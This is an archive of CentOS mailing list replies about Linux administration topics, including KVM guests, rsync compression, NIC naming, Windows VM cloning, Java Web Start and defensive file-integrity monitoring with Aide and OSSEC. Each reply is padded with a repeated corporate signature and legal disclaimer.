I'm on Ubuntu and, no, it doesn't work. From: CentOS on behalf of Liam O'Toole Sent: Thursday, April 9, 2020 3:37 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Zoom? Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Sun, 05 Apr, 2020 at 18:34:36 -0400, mark wrote: > Hi, folks, > >After I did a complete reinstall of current 7, with KDE instead of > minimal, I'm mostly ok... except for Zoom. Has anyone gotten sound working > with firefox? I get video, but it keeps claiming that my browser (the > default firefox) can't access the system sound. > >Given that even as I type this, I'm streaming WUMB through its player > I have noScript, but I enabled everything (except google-analytics), and no > joy. I'd *really* rather use my browser than trust their app > >mark I recommend installing Zoom as a flatpak: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fflathub.org%2fapps%2fdetails%2fus.zoom.Zoom=E,1,K5Y5M138hPU8kIAKZDtG7wgxiAimsZMkn_dSH_5fUIT41t2iEEH9wDFXddj-nSh160S407JVuiuIZUIeZzq_HrHe-XPwgLR_8uTfQzvA32OJ=1 It works well and is sandboxed to some extent at least. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Windows 10 as guest on Centos 8
I sense you're looking for a GUI solution here but, when I've run into trouble, my fallback is virt-install. From: CentOS on behalf of Liam O'Toole Sent: Friday, April 3, 2020 6:45 PM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Windows 10 as guest on Centos 8 Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Fri, 03 Apr, 2020 at 00:49:30 +0300, Georgios wrote: > Hi there! > Im trying to install windows 10 as a guest on Centos 8.1 > I tried with cockpit and with boxes and both times my computer freezes > during installation. > > Any ideas? > > Thanks in advance! > cockpit is intended as a replacement for virt-manager. When it fails, I suggest you fall back on the tried-and-tested approach. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Upgraded to 7.10 from 6...
This is a wild "shot in the dark" but you didn't happen to install an nvidia driver, did you? Have regretted that from the day I "upgraded' to it from a generic driver. From: CentOS on behalf of mark Sent: Thursday, April 2, 2020 5:19 PM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Upgraded to 7.10 from 6... Let me start out by making clear I *LOATHE* gnome, ok? So I don't want to hear about it. What's happening is this: I did this: yum groupinstall "Development and Creative Workstation" yum groupinstall "KDE Plasma Workspaces" Now, when I go in graphical mode, I try to change to kde on login. Nope - minutes later, I can see a cursor, and a gray screen. Ditto on the "safe mode", and ditto on "gnome classic". What have I missed? mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS 7 host with guests as bridge cannot access host
Wow, thanks for sharing, I'd have never dreamed it. From: CentOS on behalf of Jerry Geis Sent: Thursday, April 2, 2020 9:10 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] CentOS 7 host with guests as bridge cannot access host This is unfortunate. https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwiki.libvirt.org%2fpage%2fTroubleshootMacvtapHostFail=E,1,TqNsTVxQVBTpipmCCuG5tI25iPoaz-LZB2sqYNi5OPBkkLYh9oOrxZdYsgqiCUIn6E_5RLCpGmJg5-foVY9bCiyOSimZm0h1aZkDi0-3aBtGpaxlsoryjw,,=1 To the "normal" user - BRIDGE means guest is on the same network and has access to the host. Bummer. Jerry ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Need help to fix bug in rsync
I appreciate the reply - it keeps me from wondering "is there something I should be concerned about?". We use a co-location facility where we pay for bandwidth utilization so it's still an issue. From: CentOS on behalf of Pete Biggs Sent: Wednesday, March 25, 2020 1:32 PM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Wed, 2020-03-25 at 19:15 +0100, Simon Matter via CentOS wrote: > > On Wed, 2020-03-25 at 14:39 +, Leroy Tennison wrote: > > > Since you state that using -z is almost always a bad idea, could you > > > provide the rationale for that? I must be missing something. > > > > > I think the "rationale" is that at some point the > > compression/decompression takes longer than the time reduction from > > sending a compressed file. It depends on the relative speeds of the > > machines and the network. > > > > You have most to gain from compressing large files, but if they are > > already compressed, then you have nothing to gain from just doing small > > files. > > > > It obviously depends on your network speed and if you have a metered > > connection, but does anyone really have such an ancient network > > connection still these days - I mean if you have fast enough machines > > at both ends to do rapid compression/decompression, it seems unlikely > > that you will have a damp piece of string connecting them. > > I really don't understand the discussion here. What is wrong with using -z > with rsync? We're using rsync with -z for backups and just don't want to > waste bandwidth for nothing. We have better use for our bandwidth and it > makes quite a difference when backing up terabytes of data. I don't really care if you use -z, but you asked for the rationale, and I gave you it. I'm not telling you what you should do. I'll try and make it simpler - if rsync takes 1 second to compress the file, then 1 second to decompress the file, and the whole transfer of the file takes 11 seconds uncompressed vs 10 seconds compressed, then dealing with file takes overall 12 seconds compressed, vs 11 seconds uncompressed. It's not worth it. But as I said it depends on your network and your machine speeds. It's up to you to decide what is best in your own situation. P. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Need help to fix bug in rsync
That's why I asked, I wanted to know if there was something inherently bad with "-z". I had a situation where Postgresql was replicating 16M files every few minutes ("log shipping") on approximately 10 systems, got behind which resulted in almost continuous file transfer (of mostly null 16M files) and saturated the common link. Specifying compression with file transfer cut transmission time by 5-10x resolving the problem. From: CentOS on behalf of Simon Matter via CentOS Sent: Wednesday, March 25, 2020 1:15 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. t; On Wed, 2020-03-25 at 14:39 +, Leroy Tennison wrote: >> Since you state that using -z is almost always a bad idea, could you >> provide the rationale for that? I must be missing something. >> > I think the "rationale" is that at some point the > compression/decompression takes longer than the time reduction from > sending a compressed file. It depends on the relative speeds of the > machines and the network. > > You have most to gain from compressing large files, but if they are > already compressed, then you have nothing to gain from just doing small > files. > > It obviously depends on your network speed and if you have a metered > connection, but does anyone really have such an ancient network > connection still these days - I mean if you have fast enough machines > at both ends to do rapid compression/decompression, it seems unlikely > that you will have a damp piece of string connecting them. I really don't understand the discussion here. What is wrong with using -z with rsync? We're using rsync with -z for backups and just don't want to waste bandwidth for nothing. We have better use for our bandwidth and it makes quite a difference when backing up terabytes of data. The only reason why I asked for help is because we don't want to double compress data which is already compressed. This is what currently is broken in rsync without manually specifying a skip-compress list. Fixing it would help all those who don't know it's broken now. Thanks, Simon ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Need help to fix bug in rsync
Since you state that using -z is almost always a bad idea, could you provide the rationale for that? I must be missing something. From: CentOS on behalf of Peter Kjellström Sent: Wednesday, March 25, 2020 9:34 AM To: Simon Matter Cc: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Need help to fix bug in rsync On Wed, 25 Mar 2020 14:49:24 +0100 Simon Matter via CentOS wrote: > Hi, > > I've discovered a bug in rsync which leads to increased CPU usage and > slower transfers in many situations. > > When syncing with compression (-z) Tbh, using -z with rsync is almost always a bad idea (unless you're on some pre-historic type of network link..). /Peter ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] KVM clone
Since you asked, the circumstance warranting registry editing is cloning a running system to create a new instance for a different purpose while bringing it up on the same subnet. Yes, it's a little messy but it works. And thanks for the pointer about virt-sysprep. From: CentOS on behalf of Charles Polisher via CentOS Sent: Saturday, February 8, 2020 11:58 AM To: Leon Fauster ; CentOS mailing list Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. Subject: [EXTERNAL] Re: [CentOS] KVM clone On 2020-02-07 20:14, Leon Fauster via CentOS wrote: > Am 07.02.20 um 17:43 schrieb Leroy Tennison: > > Yes, have done it a few times. If you need it to have a different IP > > address/name/license then bring up a new definition without a NIC, login > > via virt-manager. For the IP address, search the registry for the current > > IP address and change the appropriate entries. Use standard Windows > > utilities to change the description/name. For the license, search for > > "Product" and select "View your Product ID", in that dialog there should be > > an option to change the product key. Once done add the same NIC as the > > other definition had and restart. This has worked all but once for me. > > The one time it didn't, Windows discerned a network problem (IP address) > > and provided a way to fix it. > I remember that for a cloned win system the SID should be also changed. > https://en.wikipedia.org/wiki/Security_Identifier I have successfully cloned many versions of Windows OS, then booted the clone and changed static IP using Network Connections widget -> Change Adaptor Settings, without incident, where my intent is never to run both systems at the same time. Not clear to me what circumstance would warrent editing the registry to obtain this result, but everything has a good use case I suppose? For completeness, as OP might know, Microsoft provides the 'sysprep' utility to prepare a system for cloning. In RHEL6 / C6 and more recent, Linux guests can be similarly prepared with 'virt-sysprep'. -- Charles Polisher ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] CentOS 7 : network interface renamed from eth0 to eth1 after reboot
There may be ways to force NIC naming, I've done so but only on Ubuntu so you'll need to do the research if it's important to you. Things to look for based on my experience: 70-persistent-net.rules, net.ifnames=0, biosdevname=0. From: CentOS on behalf of Nicolas Kovacs Sent: Sunday, February 9, 2020 12:51 PM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] CentOS 7 : network interface renamed from eth0 to eth1 after reboot Le 09/02/2020 à 16:54, Alexander Dalloz a écrit : > "Kernel always uses the ethX naming convention at boot when it enumerates > network devices. Due to parallelization, the order of the kernel interface > enumeration is expected to vary across reboots." Thanks for the heads up. I experimented quite a bit, and found some surprising behavior. So I documented everything in a little blog article. * https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.microlinux.fr%2finterfaces-reseau-persistantes%2f=E,1,apWInXfONKIS7FI-2r96hzoROBMB28lpEncRGtBCvS-yWk5DU4roROpidqfC06FNDn2rlEYO-xJjHn2B0klz4_h1y7kiuBvlSjCMer8MBCuMgAcKUg,,=1 Cheers, Niki -- Microlinux - Solutions informatiques durables 7, place de l'église - 30730 Montpezat Site : https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.microlinux.fr=E,1,egz8jO853imKX3mT5r9bs5vOCANcassZ0dea14ELcSZMwyZ5fJhfqPU6G1SltXyA8jjCrUwRU-k0Hj5oXsh2RioeNQj-7HsnfPYs1pYwHt6Vnp0cvNSVHpBAPA,,=1 Mail : i...@microlinux.fr Tél. : 04 66 63 10 32 Mob. : 06 51 80 12 12 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] KVM clone
Yes, have done it a few times. If you need it to have a different IP address/name/license then bring up a new definition without a NIC, login via virt-manager. For the IP address, search the registry for the current IP address and change the appropriate entries. Use standard Windows utilities to change the description/name. For the license, search for "Product" and select "View your Product ID", in that dialog there should be an option to change the product key. Once done add the same NIC as the other definition had and restart. This has worked all but once for me. The one time it didn't, Windows discerned a network problem (IP address) and provided a way to fix it. From: CentOS on behalf of Nikos Gatsis - Qbit Sent: Friday, February 7, 2020 5:22 AM To: centos@centos.org Subject: [EXTERNAL] [CentOS] KVM clone Hello everybody. I have a simple question. If I clone an existing KVM image of win server with static IP, the clone will have the same IP? It's probably stupid question, but I want to be sure. I have a full updated centos 7 box. Thank you in advance. Nikos. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Upgrade Centos 6 (32 Bits) to Centos 7 (32 Bits)
-> With Debian, the biggest difference is update (if you are using the command-line). Another big difference is the location and format of the networking files - /etc/network/interfaces instead of /etc/sysconfig/network-scripts/ifcfg*. From: CentOS on behalf of MAILIST Sent: Wednesday, November 27, 2019 9:39 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] Upgrade Centos 6 (32 Bits) to Centos 7 (32 Bits) > I have a very old PC ( Acer2000) 32 Bits. On this machine I am running (Do > not laugh) SCO Unix in an antique version : So Centos6 probes with the > bootloader on this OS and other OS s. There is a group that voluntarily maintains a 32-bit CentOS 7. I installed that on an old Dell Celeron desktop. The performance was so poor, it was unusable. Then, I tried the lubuntu distro, and that has been running smoothly since July. It is also well-maintained, as there are regular updates. Lubuntu is a derivitive of Ubuntu, which is a derivative of Debian. With Debian, the biggest difference is update (if you are using the command- line). Todd Merriman Software Toolz, Inc. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] how to know when a system is compromised
Actually, a defense here is to umount the path then remount it as a part of running the Aide script. There may be an end-run to this as well- security is a never-ending battle. From: CentOS on behalf of Leroy Tennison Sent: Thursday, November 14, 2019 1:20 PM To: CentOS mailing list Subject: Re: [CentOS] how to know when a system is compromised Thanks - I'll keep that in mind... Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Chris Adams Sent: Thursday, November 14, 2019 10:57 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] how to know when a system is compromised Once upon a time, Leroy Tennison said: > The executable could be placed on mounted read-only media That's not as secure as you think. Linux bind mounts can mount a file over another file (plus there's overlay filesystems), so it's possible to replace a binary even on a read-only device. -- Chris Adams ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,2WCvbSNJvmqaxEcIPqawoTvGCYMAZT8KKulxxbmjkGLa2NyJ5IO_EL51Q21yyoZLhvJczf6IGyKITC8kW5WKMrP4AYTtFLWcu5R1E3VMstTAfGRFhCRv0w,,=1<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,bJ-3jUtOeY3WPfKHckYn-Ynl3cYkeINegX0H-YsrIDlgsWb1g8GzM6JCS3rmWWxVwOPgOf_AMxvsKjsW_iVVobRWFKpTzsvz4Bfhlu5s=1>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] how to know when a system is compromised
Thanks - I'll keep that in mind... From: CentOS on behalf of Chris Adams Sent: Thursday, November 14, 2019 10:57 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] how to know when a system is compromised Once upon a time, Leroy Tennison said: > The executable could be placed on mounted read-only media That's not as secure as you think. Linux bind mounts can mount a file over another file (plus there's overlay filesystems), so it's possible to replace a binary even on a read-only device. -- Chris Adams ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] how to know when a system is compromised
This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC. Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so changes between runs which are undone go unnoticed. Also, somehow you need to protect the executable and configuration file so that an attacker can't replace the executable or read the configuration and find a way around it. The executable could be placed on mounted read-only media, last time I checked Netac and Kanguru still made USB sticks with write-protect switches. Our best effort for protecting configuration is to deliver the configuration file just-in-time and delete it after the scheduled run, not a great solution, anybody have a better idea? OSSEC is daemon-based and centrally-managed. It is a HIDS rather than just a FIMS as Aide is. Its log monitoring has surfaced operational issues in addition to security ones (Postfix got in an odd state and had to be restarted for example). Unfortunately, false positives are common, especially if you use the "detect new files" feature. They admit that dealing with software updates is problematic. I've used auditd to trace down what ended up being a funny situation, Aide detected that /etc/hosts.deny would change timestamp but nothing else, turns out OSSEC has an active response feature to block attacks which involves updating that file to block a host for 10 minutes. You could also look into inotify options and Samhain is another HIDS (I'd love to hear about anyone's experience with it). A free variant of tripwire may still exist but is probably unsupported and Aide is a clone of it. I noticed that rootkit detection has also been mentioned in another reply. From: CentOS on behalf of Christopher Wensink Sent: Thursday, November 14, 2019 9:40 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] how to know when a system is compromised How do you know when a Linux system has been compromised? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS newsletters, and I try to keep current on all technology with credible sources of articles online and with the Lynda library. What other sources of information do you use to stay current about the latest threats and technology updates? I appreciate the feedback. Chris ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Firefox 68 jnlp files
Not knowing what kind of server management you're looking for I can only make general suggestions. We found that the removal of Java support (actually NSAPI in favor of the Pepper API which Oracle has stated they won't support) left us with limited IPMI (iLO, DRAC, whatever) functionality. And, looking at https://en.wikipedia.org/wiki/Java_Web_Start, Oracle has stopped supporting javaws. In our case (SuperMicro) we found two things: their newer hardware had switched to HTML5/iKVM which didn't require Java and SuperMicro had supplied non-browser-based (but Java-based) programs which supplied equivalent functionality for the legacy hardware. My recommendation would be to look into those alternatives. Java Web Start - Wikipedia<https://en.wikipedia.org/wiki/Java_Web_Start> In computing, Java Web Start (also known as JavaWS, javaws or JAWS) is a framework developed by Sun Microsystems (now Oracle) that allows users to start application software for the Java Platform directly from the Internet using a web browser.Some key benefits of this technology include seamless version updating for globally distributed applications and greater control of memory allocation to ... en.wikipedia.org From: CentOS on behalf of isdtor Sent: Thursday, November 14, 2019 8:17 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Firefox 68 jnlp files isdtor writes: > It seems that firefox 68.x, as distributed with CentOS6 updates, no longer > allows opening jnlp files with javaws > > The "Choose Helper Application" window popping up after selecting "Open > with/Other" has a predefined list of applications that cannot be customised. > > I'm sure it must be a configuration issue as this works fine with the same > browser on other distributions, but what to look for? > > # alternatives --display javaws > javaws - status is auto. > link currently points to /usr/java/latest/jre/bin/javaws > /usr/java/latest/jre/bin/javaws - priority 20 > Current `best' version is /usr/java/latest/jre/bin/javaws. > # ll -L /etc/alternatives/javaws > -rwxr-xr-x 1 root root 140296 Dec 15 2018 /etc/alternatives/javaws > # No replies, really? Lack of this facility makes browser and platform unusable for server management. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
